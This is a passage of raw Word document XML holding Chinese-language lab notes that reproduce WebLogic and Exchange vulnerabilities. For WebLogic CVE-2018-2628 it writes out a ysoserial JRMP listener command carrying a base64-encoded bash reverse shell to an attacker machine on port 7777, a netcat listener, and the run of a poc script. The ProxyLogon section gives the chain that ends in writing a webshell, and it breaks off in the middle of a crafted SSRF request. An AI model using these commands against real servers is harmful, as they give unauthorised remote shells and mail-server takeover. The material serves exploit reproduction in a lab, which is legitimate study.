    <w:bookmarkStart w:name="ue9663cb3" w:id="62"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u493fc333" w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5774266" cy="380271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4266" cy="380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bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:name="u681924df" w:id="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T3协议已开启</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:name="u16e1e987" w:id="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POC检测：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:name="DGDHC" w:id="6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python2 CVE-2018-2628-MultiThreading.py</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:name="ud9efa6e8" w:id="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在url.txt中填入目标主机的“ip:port”，这里填入192.168.124.139:7001.在命令行运行CVE-2018-2628-MultiThreading.py开始检测，可以看到检测结果为漏洞存在。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:name="uf7ce00b1" w:id="68"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u17566332" w:id="69"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5791200" cy="154004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54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bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:name="u6eab9ea6" w:id="70"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ue94ffddc" w:id="71"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="53742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66666" cy="77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bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:name="IbWY4" w:id="7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 04 漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkStart w:name="u1cb285a1" w:id="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使用ysoserial启动一个JRMP Server,用于存放恶意攻击类，</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:name="Qimtc" w:id="7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java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 22801 Jdk7u21 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC4yMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:name="u18c2c618" w:id="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22801:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JRMP服务器监听的端口</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:name="u853852d7" w:id="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payload:为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="c7254e"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="f9f2f4"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp; /dev/tcp/192.168.124.20/7777 0&gt;&amp;1经过</w:t>
      </w:r>
      <w:hyperlink r:id="rId16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base64</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="f9f2f4"/>
        </w:rPr>
        <w:t>加密的。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkStart w:name="u2cf34d3c" w:id="77"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ub17609ac" w:id="78"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="4556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209867" cy="87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bookmarkEnd w:id="77"/>
    <w:bookmarkStart w:name="u73a46508" w:id="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然后我们在攻击机里面执行</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkStart w:name="wMeOt" w:id="8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java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 192.168.124.20:22801 | xxd -p | tr -d $'\n' &amp;&amp; echo</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:name="u4e1cfe88" w:id="81"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="uafb8b7b9" w:id="82"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="2979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61600" cy="52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</w:p>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:name="ub59d3529" w:id="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生成序列化字符串</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:name="u12637313" w:id="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复制这串数字到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="c7254e"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="f9f2f4"/>
        </w:rPr>
        <w:t>weblogic_poc.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>里面将下图payload部分替换</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:name="ua6c21015" w:id="85"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u143c69e6" w:id="86"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="145464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21067" cy="296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</w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:name="u9fc36712" w:id="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替换dip</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkStart w:name="udc2d743a" w:id="88"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ucc1cff78" w:id="89"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5164667" cy="28349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4667" cy="283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9"/>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:name="u1d96e087" w:id="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在我们的攻击机上监听一下反弹shell的接受端口</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:name="d7EhV" w:id="9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nc -lvp 7777</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkStart w:name="ud121f1e8" w:id="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换个终端执行</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkStart w:name="ZioOW" w:id="9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python2 weblogic_poc.py</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkStart w:name="ud8d778c7" w:id="94"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ufaa50c81" w:id="95"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="6951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53333" cy="141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</w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkStart w:name="ucff4c67d" w:id="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显示payload请求成功</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkStart w:name="u8c194f3a" w:id="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d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后我们就可以在我们的监听端口看到反弹shell成功</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="97"/>
    <w:bookmarkStart w:name="u5362fce0" w:id="98"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u3ac74866" w:id="99"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="11040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803467" cy="204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9"/>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:bookmarkStart w:name="g9qhv" w:id="1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0x04 攻击漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:name="pqwcp" w:id="10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CVE-2018-2894</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkStart w:name="Hr7VX" w:id="1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0x00 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkStart w:name="uc2644f08" w:id="103"/>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:name="WgzdH" w:id="10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0x01 受影响WebLogic版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:bookmarkStart w:name="uec15f4cf" w:id="105"/>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkStart w:name="vQdX0" w:id="1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0x02 环境搭建</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkStart w:name="u5e0ae7dd" w:id="107"/>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkStart w:name="bGmiz" w:id="1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0x03 验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkStart w:name="ub8ca0eae" w:id="109"/>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:name="jHyVO" w:id="1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0x04 攻击漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110"/>
    <w:bookmarkStart w:name="uf864ca84" w:id="111"/>
    <w:bookmarkEnd w:id="111"/>
    <w:bookmarkStart w:name="ZvrRA" w:id="11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CVE-2019-2725</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="112"/>
    <w:bookmarkStart w:name="q8yUB" w:id="1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0x00 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="113"/>
    <w:bookmarkStart w:name="ub128e44f" w:id="114"/>
    <w:bookmarkEnd w:id="114"/>
    <w:bookmarkStart w:name="ZS534" w:id="11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0x01 受影响WebLogic版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="115"/>
    <w:bookmarkStart w:name="u01d0e3b7" w:id="116"/>
    <w:bookmarkEnd w:id="116"/>
    <w:bookmarkStart w:name="XajCp" w:id="11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0x02 环境搭建</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="117"/>
    <w:bookmarkStart w:name="u58ef53d5" w:id="118"/>
    <w:bookmarkEnd w:id="118"/>
    <w:bookmarkStart w:name="JE87s" w:id="11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0x03 验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:name="ud6b026a4" w:id="120"/>
    <w:bookmarkEnd w:id="120"/>
    <w:bookmarkStart w:name="Js2Yh" w:id="1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0x04 攻击漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="121"/>
    <w:bookmarkStart w:name="uf431ef99" w:id="122"/>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkStart w:name="h9VH7" w:id="12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CVE-2020-14882</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkStart w:name="ZEZUp" w:id="1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0x00 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="124"/>
    <w:bookmarkStart w:name="u42b120f1" w:id="125"/>
    <w:bookmarkEnd w:id="125"/>
    <w:bookmarkStart w:name="MbrAL" w:id="1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0x01 受影响WebLogic版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="126"/>
    <w:bookmarkStart w:name="u9ab81eb1" w:id="127"/>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkStart w:name="ov6KS" w:id="1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0x02 环境搭建</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="128"/>
    <w:bookmarkStart w:name="u73fa0338" w:id="129"/>
    <w:bookmarkEnd w:id="129"/>
    <w:bookmarkStart w:name="TG5U6" w:id="1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0x03 验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="130"/>
    <w:bookmarkStart w:name="udaa6aa00" w:id="131"/>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkStart w:name="O2jUZ" w:id="1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0x04 攻击漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="132"/>
    <w:bookmarkStart w:name="EGWzr" w:id="13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JBoss</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkStart w:name="u610bae65" w:id="134"/>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:name="nDI9s" w:id="13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Exchange</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:name="u41df278b" w:id="136"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId2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Exchange总结</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:name="u954735b0" w:id="137"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId2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Exchange漏洞复现</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="137"/>
    <w:bookmarkStart w:name="ued7ecf90" w:id="138"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ieqln" w:id="139"/>
      <w:bookmarkEnd w:id="139"/>
      <w:hyperlink r:id="rId25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https://msrc.microsoft.com/update-guide/vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:name="ieqln" w:id="140"/>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:bookmarkEnd w:id="138"/>
    <w:bookmarkStart w:name="u9b50c08c" w:id="1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代码调试：</w:t>
      </w:r>
      <w:hyperlink r:id="rId26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Exchange “ProxyLogon”系列漏洞分析-技术圈</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkStart w:name="uf8f57002" w:id="1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工具：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="5f9cef"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>调试⼯具--dnspy</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkStart w:name="RI1PU" w:id="14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CVE-2021-26855</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:bookmarkStart w:name="u64d4697f" w:id="144"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ytfTm" w:id="145"/>
      <w:bookmarkEnd w:id="145"/>
      <w:hyperlink r:id="rId2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>https://saucer-man.com/information_security/748.html#cl-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:name="ytfTm" w:id="146"/>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:bookmarkEnd w:id="144"/>
    <w:bookmarkStart w:name="u46ff308f" w:id="147"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId28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CVE-2021–26855与CVE-2021–27065漏洞分析及复现 - 先知社区</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="147"/>
    <w:bookmarkStart w:name="u56d7cd06" w:id="148"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId29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CVE-2021-26855 proxylogon复现 | half90’s blog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="148"/>
    <w:bookmarkStart w:name="HnQbu" w:id="1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漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="149"/>
    <w:bookmarkStart w:name="u62f7721d" w:id="1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服务端请求伪造（SSRF）漏洞，通过该漏洞，攻击者可以发送任意HTTP请求并通过Exchange Server进行身份验证，获取权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2021-26855又名proxylogon，是利用ssrf绕过权限验证，再结合同期Exchange的其他漏洞例如文件写入（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2021-27065</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）等漏洞进行无权限rce</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="150"/>
    <w:bookmarkStart w:name="u6952399c" w:id="1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34495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>具体过程如下：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="151"/>
    <w:bookmarkStart w:name="uf00cd35e" w:id="1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4495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1、 通过SSRF漏洞攻击,访问autodiscover.xml泄露LegacyDN信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2、 在通过LegacyDN, 获取SID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.、然后通过合法的SID,获取exchange的有效cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4.、最后通过有效的cookie,对OABVirtualDirectory对象进行恶意操作，写入一句话木马，达到控制目标的效果.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="152"/>
    <w:bookmarkStart w:name="P7HJf" w:id="15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搭建AD域控</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkStart w:name="ua9b31aef" w:id="1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这里就不详述了</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="154"/>
    <w:bookmarkStart w:name="OOvpm" w:id="1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安装Exchange2016</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="155"/>
    <w:bookmarkStart w:name="u49fd03cc" w:id="1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然后安装一下依赖的组件:(参考</w:t>
      </w:r>
      <w:hyperlink r:id="rId30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https://docs.microsoft.com/zh-cn/exchange/plan-and-deploy/prerequisites?view=exchserver-2016）</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="156"/>
    <w:bookmarkStart w:name="ucf6bb80d" w:id="1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1.NET Framework 4.8</w:t>
      </w:r>
      <w:hyperlink r:id="rId31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https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/0fd66638cde16859462a6243a4629a50/ndp48-x86-x64-allos-enu.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="157"/>
    <w:bookmarkStart w:name="u83ff17fe" w:id="1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2.安装Visual C++ Redistributable Package for Visual Studio 2012 </w:t>
      </w:r>
      <w:hyperlink r:id="rId32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https://www.microsoft.com/en-us/download/details.aspx?id=30679</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="158"/>
    <w:bookmarkStart w:name="u53f7c219" w:id="1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3.Visual C++ 2013 Redistributable Package</w:t>
      </w:r>
      <w:hyperlink r:id="rId3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https://support.microsoft.com/zh-cn/topic/update-for-visual-c-2013-redistributable-package-d8ccd6a5-4e26-c290-517b-8da6cfdf4f10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="159"/>
    <w:bookmarkStart w:name="u755eb057" w:id="1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4.通过Power Shell安装Exchange必备的Windows组件</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="160"/>
    <w:bookmarkStart w:name="o3MxA" w:id="16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Install-WindowsFeature Server-Media-Foundation, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, RSAT-Clustering-Mgmt, RSAT-Clustering-PowerShell, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation, RSAT-ADDS</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="161"/>
    <w:bookmarkStart w:name="ue25e5ed0" w:id="1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然后下载exchange 2016 ios:</w:t>
      </w:r>
      <w:hyperlink r:id="rId3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https://download.microsoft.com/download/d/2/3/d23b113b-9634-4456-acba-1f7b0ce22b0e/ExchangeServer2016-x64-cu18.iso</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="162"/>
    <w:bookmarkStart w:name="ud4498f57" w:id="163"/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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邮箱管理登录页面：https://localhost/ecp</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="163"/>
    <w:bookmarkStart w:name="u085a9350" w:id="164"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:name="uf1be2d26" w:id="165"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="2383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768667" cy="480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5"/>
    </w:p>
    <w:bookmarkEnd w:id="164"/>
    <w:bookmarkStart w:name="u6b874519" w:id="166"/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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个人邮箱用户登录页面：https://localhost/owa</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="166"/>
    <w:bookmarkStart w:name="ua2ceabf9" w:id="167"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:name="u56ac9033" w:id="168"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="351069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69866" cy="521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8"/>
    </w:p>
    <w:bookmarkEnd w:id="167"/>
    <w:bookmarkStart w:name="q2BxJ" w:id="16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漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="169"/>
    <w:bookmarkStart w:name="u42f7770d" w:id="1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POC:</w:t>
      </w:r>
      <w:hyperlink r:id="rId3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https://github.com/herwonowr/exprolog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="170"/>
    <w:bookmarkStart w:name="u3ZPJ" w:id="17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POST /ecp/target.js HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: 192.168.179.2</w:t>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36</w:t>
        <w:br/>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
        <w:br/>
        <w:t>Accept: */*</w:t>
        <w:br/>
        <w:t>Connection: close</w:t>
        <w:br/>
        <w:t>Cookie: X-BEResource=[name]@WIN-N15UUJ077R0.saucerman.com:443/autodiscover/autodiscover.xml?#~1941962754</w:t>
        <w:br/>
        <w:t>Content-Type: text/xml</w:t>
        <w:br/>
        <w:t>Content-Length: 348</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>&lt;Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"&gt;</w:t>
        <w:br/>
        <w:t>&lt;Request&gt;</w:t>
        <w:br/>
        <w:t>&lt;EMailAddress&gt;administrator@saucerman.com&lt;/EMailAddress&gt;</w:t>
        <w:br/>
